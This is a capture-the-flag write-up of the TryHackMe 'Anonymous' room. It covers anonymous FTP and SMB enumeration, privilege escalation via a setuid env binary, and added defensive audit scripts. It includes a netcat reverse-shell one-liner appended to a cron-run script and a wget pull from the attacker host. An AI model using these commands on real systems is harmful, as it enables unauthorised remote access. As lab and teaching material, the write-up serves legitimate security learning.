Anonymous Writeup

Description:

This post is a writeup of the Anonymous room on TryHackMe: https://tryhackme.com/room/anonymous

| Machine Details | |
| --- | --- |
| OS | Linux |
| Rating | Medium |
| Creator | namelessone |

Summary

The room has 4 open ports, with anonymous login allowed on FTP and one SMB share exposed. After logging into FTP we find a script that is probably being run as a cron job. Appending a reverse shell to it and waiting gives us a shell. For privilege escalation, env has the SUID bit set; exploiting that gets us the root flag.

Walkthrough

Enumeration

Let’s start with an nmap scan.

```text
nmap -sC -sV -oA nmap/pickhill 10.10.74.228
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-26 10:45 IST
Nmap scan report for 10.10.74.228
Host is up (0.31s latency).
Not shown: 995 closed ports
PORT     STATE    SERVICE     VERSION
21/tcp   open     ftp         vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx    2 111      113          4096 Jun 04 19:26 scripts [NSE: writeable]
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.9.124.57
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp   open     ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 8b:ca:21:62:1c:2b:23:fa:6b:c6:1f:a8:13:fe:1c:68 (RSA)
|   256 95:89:a4:12:e2:e6:ab:90:5d:45:19:ff:41:5f:74:ce (ECDSA)
|_  256 e1:2a:96:a4:ea:8f:68:8f:cc:74:b8:f0:28:72:70:cd (ED25519)
139/tcp  open     netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open     netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
8001/tcp filtered vcom-tunnel
Service Info: Host: ANONYMOUS; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 18s, deviation: 0s, median: 17s
|_nbstat: NetBIOS name: ANONYMOUS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: anonymous
|   NetBIOS computer name: ANONYMOUS\x00
|   Domain name: \x00
|   FQDN: anonymous
|_  System time: 2020-08-26T05:16:21+00:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-08-26T05:16:21
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 67.52 seconds
```

Let’s start with FTP.

FTP

Let’s check it by logging in.

Logged in as anonymous

```text
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxrwx    2 111      113          4096 Jun 04 19:26 .
drwxr-xr-x    3 65534    65534        4096 May 13 19:49 ..
-rwxr-xrwx    1 1000     1000          314 Jun 04 19:24 clean.sh
-rw-rw-r--    1 1000     1000         2107 Aug 26 05:36 removed_files.log
-rw-r--r--    1 1000     1000           68 May 12 03:50 to_do.txt
226 Directory send OK.
ftp> mget *
mget clean.sh? y
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for clean.sh (314 bytes).
226 Transfer complete.
314 bytes received in 0.00 secs (350.4464 kB/s)
mget removed_files.log? y
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for removed_files.log (2150 bytes).
226 Transfer complete.
2150 bytes received in 0.00 secs (9.0326 MB/s)
mget to_do.txt? y
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for to_do.txt (68 bytes).
226 Transfer complete.
68 bytes received in 0.00 secs (412.4612 kB/s)
ftp> exit
```

So we can see the script; maybe we can edit it to get a shell.
I’ll come back to that. Let’s enumerate SMB now.

SMB

```text
=========================================
|    Share Enumeration on 10.10.74.228    |
=========================================

      Sharename       Type      Comment
      ---------       ----      -------
      print$          Disk      Printer Drivers
      pics            Disk      My SMB Share Directory for Pics
      IPC$            IPC       IPC Service (anonymous server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available

[+] Attempting to map shares on 10.10.74.228
//10.10.74.228/print$   Mapping: DENIED, Listing: N/A
//10.10.74.228/pics     Mapping: OK, Listing: OK
//10.10.74.228/IPC$
```

The pics share is open but doesn’t contain anything useful, and I had more or less already guessed the exploitation path, so I skipped it.
Let’s move on to the exploitation part.

Exploitation

```text
silver@parrot  ~/Desktop/tryhackme/anonymous/nmap  curlftpfs anonymous:anon@10.10.74.228 /home/silver/Desktop/tryhackme/anonymous/nmap/my_ftp
 silver@parrot  ~/Desktop/tryhackme/anonymous/nmap  lks
zsh: correct 'lks' to 'ls' [nyae]? y
my_ftp  pickhill.gnmap  pickhill.nmap  pickhill.xml
 silver@parrot  ~/Desktop/tryhackme/anonymous/nmap  cd my_ftp
ls
 silver@parrot  ~/Desktop/tryhackme/anonymous/nmap/my_ftp  ls
scripts
 silver@parrot  ~/Desktop/tryhackme/anonymous/nmap/my_ftp  ls -la
total 4
drwxr-xr-x 1 root   root   1024 Jan  1  1970 .
drwxr-xr-x 1 silver silver   90 Aug 26 11:15 ..
drwxrwxrwx 2 root   root   4096 Jun  4 19:26 scripts
 silver@parrot  ~/Desktop/tryhackme/anonymous/nmap/my_ftp  cd scripts
 silver@parrot  ~/Desktop/tryhackme/anonymous/nmap/my_ftp/scripts  ls -la
total 16
drwxrwxrwx 2 root root 4096 Jun  4 19:26 .
drwxr-xr-x 1 root root 1024 Jan  1  1970 ..
-rwxr-xrwx 1 root root  314 Jun  4 19:24 clean.sh
-rw-rw-r-- 1 root root 2580 Aug 26 05:47 removed_files.log
-rw-r--r-- 1 root root   68 May 12 03:50 to_do.txt
 silver@parrot  ~/Desktop/tryhackme/anonymous/nmap/my_ftp/scripts  cat clean.sh
#!/bin/bash

tmp_files=0
echo $tmp_files
if [ $tmp_files=0 ]
then
        echo "Running cleanup script:  nothing to delete" >> /var/ftp/scripts/removed_files.log
else
    for LINE in $tmp_files; do
        rm -rf /tmp/$LINE && echo "$(date) | Removed file /tmp/$LINE" >> /var/ftp/scripts/removed_files.log;done
fi
 silver@parrot  ~/Desktop/tryhackme/anonymous/nmap/my_ftp/scripts  echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.124.57 4444 >/tmp/f" >> clean.sh
zsh: operation not supported: clean.sh
 ✘ silver@parrot  ~/Desktop/tryhackme/anonymous/nmap/my_ftp/scripts  ls -la
total 16
drwxrwxrwx 2 root root 4096 Jun  4 19:26 .
drwxr-xr-x 1 root root 1024 Jan  1  1970 ..
-rwxr-xrwx 1 root root  314 Jun  4 19:24 clean.sh
-rw-rw-r-- 1 root root 2709 Aug 26 05:50 removed_files.log
-rw-r--r-- 1 root root   68 May 12 03:50 to_do.txt
nano clean.sh
 silver@parrot  ~/Desktop/tryhackme/anonymous/nmap/my_ftp/scripts  nano clean.sh
 silver@parrot  ~/Desktop/tryhackme/ano
```

The echo append failed over curlftpfs, so the line went into clean.sh with nano instead. Here is our reverse shell:

```text
 silver@parrot  ~/Desktop/tryhackme/anonymous/nmap/my_ftp/scripts  pwncat --listen --port 4444
[11:44:44] received connection from 10.10.74.228:44016                                                                 connect.py:148
[11:44:47] new host w/ hash 9bc647e33bc8a15fe1850dcd4a2752c1                                                            victim.py:329
[11:45:05] pwncat running in /bin/sh                                                                                    victim.py:363
[11:45:16] pwncat is ready 🐈                                                                                           victim.py:762


\[\033[01;31m\](remote)\[\033[00m\] \[\033[01;33m\]\u@\h\[\033[00m\]:\[\033[01;36m\]\w\[\033[00m\]$
\[\033[01;31m\](remote)\[\033[00m\] \[\033[01;33m\]\u@\h\[\033[00m\]:\[\033[01;36m\]\w\[\033[00m\]$ bash
namelessone@anonymous:/$
```

We are in as user namelessone. Now let’s move on to PrivEsc.
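Two things about clean.sh are worth spelling out from the defender's side. Its test `[ $tmp_files=0 ]` is a single word with no spaces around the `=`, so the shell sees a one-argument test that is true for any non-empty string and the delete branch can never run. The real weakness, though, is not the typo: a script that a cron job executes under the namelessone account sits in a world-writable directory that is also served over anonymous FTP, which is exactly what let us rewrite it. The POSIX shell snippet below is an added example, not code from the room or the writeup: the first two functions show the broken and the corrected comparison, and check_cron_script reports the ownership and permission conditions that make a cron-run script replaceable. The function names, the expected-owner parameter and the temporary tree in the demo are my own constructions.

```shell
#!/bin/sh
# Added example (not the room's or the writeup's code).

# 1. The comparison used in the room's clean.sh: `[ $tmp_files=0 ]`.
#    Without spaces the shell passes ONE word to test, e.g. `[ 0=0 ]` or
#    `[ 5=0 ]`, and a one-argument test is true whenever that word is
#    non-empty. The else branch (the rm loop) is therefore unreachable.
buggy_test() {
    tmp_files="$1"
    if [ $tmp_files=0 ]; then echo true; else echo false; fi
}

# 2. The comparison the script presumably meant: `=` as its own word and the
#    variable quoted, so an empty value still gives a valid three-word test.
fixed_test() {
    tmp_files="$1"
    if [ "$tmp_files" = 0 ]; then echo true; else echo false; fi
}

# 3. Audit a script that some account's cron job executes. Prints one tag per
#    finding and returns 1 if anything was found, so it can gate a deploy.
#    Conditions: owner differs from the account that runs the job, group- or
#    world-writable file, or a world-writable parent directory (the file can
#    then be deleted and recreated even if it is itself read-only).
check_cron_script() {
    script="$1"; expected_owner="$2"
    dir=$(dirname "$script")
    found=0
    owner=$(ls -ld "$script" | awk '{print $3}')
    if [ "$owner" != "$expected_owner" ]; then
        echo "OWNER_MISMATCH $script owned by $owner, expected $expected_owner"; found=1
    fi
    if [ -n "$(find "$script" -prune -perm -020)" ]; then
        echo "FILE_GROUP_WRITABLE $script"; found=1
    fi
    if [ -n "$(find "$script" -prune -perm -002)" ]; then
        echo "FILE_WORLD_WRITABLE $script"; found=1
    fi
    if [ -n "$(find "$dir" -prune -perm -002)" ]; then
        echo "DIR_WORLD_WRITABLE $dir"; found=1
    fi
    return "$found"
}

# Demo on a constructed tree that mirrors the target's /var/ftp/scripts
# layout (drwxrwxrwx directory, -rwxr-xrwx script), then the tightened form.
demo() {
    work=$(mktemp -d)
    mkdir "$work/scripts" && chmod 777 "$work/scripts"
    printf '#!/bin/bash\necho cleanup\n' > "$work/scripts/clean.sh"
    chmod 757 "$work/scripts/clean.sh"
    echo "--- as deployed on the target:"
    check_cron_script "$work/scripts/clean.sh" "$(id -un)" || echo "(audit failed, as expected)"
    chmod 755 "$work/scripts" "$work/scripts/clean.sh"
    echo "--- after tightening permissions:"
    check_cron_script "$work/scripts/clean.sh" "$(id -un)" && echo "(audit clean)"
    rm -rf "$work"
}
demo
```

The audit uses only `ls`, `awk` and octal `find -perm` tests so it runs under dash as well as bash; run it against each script referenced from crontabs and /etc/cron.d with the account the job runs as, and treat any non-zero exit as a finding.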

PrivEsc

Here we go: the user is in the lxd group.

```text
====================================( Basic information )=====================================
OS: Linux version 4.15.0-99-generic (buildd@lcy01-amd64-013) (gcc version 7.5.0 (Ubuntu 7.5.0-3ubuntu1~18.04)) #100-Ubuntu SMP Wed Apr 22 20:32:56 UTC 2020
User & Groups: uid=1000(namelessone) gid=1000(namelessone) groups=1000(namelessone),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
```

So let's try the lxd privesc.

On the attacking machine:

```text
git clone  https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine

python -m SimpleHTTPServer 8001
```

On the target:

```text
namelessone@anonymous:/tmp$ lxc list
If this is your first time running LXD on this machine, you should also run: lxd init
To start your first container, try: lxc launch ubuntu:18.04

+------+-------+------+------+------+-----------+
| NAME | STATE | IPV4 | IPV6 | TYPE | SNAPSHOTS |
+------+-------+------+------+------+-----------+
namelessone@anonymous:/tmp$ wget 10.9.124.57:8001/alpine.tar.gz

namelessone@anonymous:/tmp$ lxc image import ./alpine.tar.gz --alias myimage

namelessone@anonymous:/tmp$ lxc image list
+---------+--------------+--------+-------------------------------+--------+--------+------------------------------+
|  ALIAS  | FINGERPRINT  | PUBLIC |          DESCRIPTION          |  ARCH  |  SIZE  |         UPLOAD DATE          |
+---------+--------------+--------+-------------------------------+--------+--------+------------------------------+
| myimage | cb2dd242acb1 | no     | alpine v3.12 (20200826_12:01) | x86_64 | 2.97MB | Aug 26, 2020 at 6:35am (UTC) |
+---------+--------------+--------+-------------------------------+--------+--------+------------------------------+

Error: No storage pool found. Please create a new storage pool
```

Ah, that doesn’t look like the right way. Let’s check another one.

SUID

env has the SUID bit set; I hadn’t noticed it earlier. Let’s check GTFOBins.

env

```text
namelessone@anonymous:/tmp# id
uid=1000(namelessone) gid=1000(namelessone) euid=0(root) groups=1000(namelessone),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
```

We have euid 0.
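A setuid bit on a general-purpose launcher like env is the whole finding here: every program it execs inherits euid 0, and it never shows up in a sudoers review. The control that catches this is a baseline of the setuid files expected on the host, with an alert on any deviation. The snippet below is an added example, not from the room or the writeup; list_suid and unexpected_suid are names chosen here, and the directory tree and baseline file in the demo are constructed.

```shell
#!/bin/sh
# Added example (not the room's or the writeup's code): baseline check for
# setuid files, the control that would have flagged the setuid env binary.

# Print regular files with the setuid bit under DIR, sorted, staying on one
# filesystem. Errors (unreadable directories) are dropped so the listing is
# usable from a non-root monitoring account.
list_suid() {
    find "$1" -xdev -type f -perm -4000 2>/dev/null | sort
}

# Compare the current listing with BASELINE (one expected absolute path per
# line). Unexpected entries are printed; return 1 if there were any, 0 if the
# host matches its baseline. grep -vxF exits 0 only when it printed a line,
# so the if-branch is the "something unexpected" case.
unexpected_suid() {
    dir="$1"; baseline="$2"
    if list_suid "$dir" | grep -vxF -f "$baseline"; then
        return 1
    fi
    return 0
}

# Demo on a constructed tree: a legitimate setuid passwd, a non-setuid ls,
# and a stray setuid copy of env, with only passwd in the baseline.
demo() {
    work=$(mktemp -d)
    mkdir -p "$work/usr/bin"
    : > "$work/usr/bin/passwd"; chmod 4755 "$work/usr/bin/passwd"
    : > "$work/usr/bin/env";    chmod 4755 "$work/usr/bin/env"
    : > "$work/usr/bin/ls";     chmod 755  "$work/usr/bin/ls"
    printf '%s\n' "$work/usr/bin/passwd" > "$work/suid.baseline"
    echo "--- setuid files not in baseline:"
    if unexpected_suid "$work" "$work/suid.baseline"; then
        echo "(none)"
    fi
    rm -rf "$work"
}
demo
```

In practice the baseline is generated once from a freshly built host (`list_suid / > suid.baseline`), stored with the configuration, and the comparison runs from cron or the monitoring agent; a new line such as a setuid env is a finding regardless of who created it.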

Let’s read root.txt.

root.txt

This post is licensed under CC BY 4.0 by the author.